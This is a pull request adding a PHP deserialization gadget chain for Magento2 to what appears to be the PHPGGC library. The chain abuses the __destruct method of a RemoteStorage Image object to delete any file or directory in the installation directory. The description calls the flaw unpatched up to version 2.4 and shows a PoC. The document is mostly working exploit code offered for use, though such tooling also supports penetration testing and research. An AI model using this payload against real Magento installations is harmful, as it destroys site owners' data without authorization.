### PR TITLE
Arbitrary file deletion in Magento2

### DIFF
--- a/gadgetchains/Magento2/FD/1/chain.php
+++ b/gadgetchains/Magento2/FD/1/chain.php
@@ -1,0 +1,19 @@
+<?php
+
+namespace GadgetChain\Magento2;
+
+class FD1 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '*';
+    public static $vector = '__destruct';
+    public static $author = 'Arjun Shibu (twitter.com/0xsegf)';
+    public static $information = 'Deletes a given file/directory in the installation dir';
+    public static $parameters = ['file'];
+
+    public function generate(array $parameters)
+    {
+        $file = $parameters['file'];
+
+        return new \Magento\RemoteStorage\Plugin\Image($file);
+    }
+}

--- a/gadgetchains/Magento2/FD/1/gadgets.php
+++ b/gadgetchains/Magento2/FD/1/gadgets.php
@@ -1,0 +1,22 @@
+<?php
+
+namespace Magento\Framework\Filesystem\Driver {
+    class File {}
+}
+
+namespace Magento\Framework\Filesystem\Directory {
+    class Write {
+        public function __construct() {
+            $this->driver = new \Magento\Framework\Filesystem\Driver\File();
+        }
+    }
+}
+
+namespace Magento\RemoteStorage\Plugin {
+    class Image {
+        public function __construct($file) {
+            $this->tmpDirectoryWrite = new \Magento\Framework\Filesystem\Directory\Write();
+            $this->tmpFiles = [$file];
+        }
+    }
+}


### PR DESCRIPTION
`__destruct()` chain capable of deleting any files/directory inside the Magento2 installation dir. It's not yet patched and works well till the latest version (2.4)

#### PoC:
![image](https://user-images.githubusercontent.com/43996156/153526456-692b4031-361b-47fa-9480-f3979c2085d0.png)
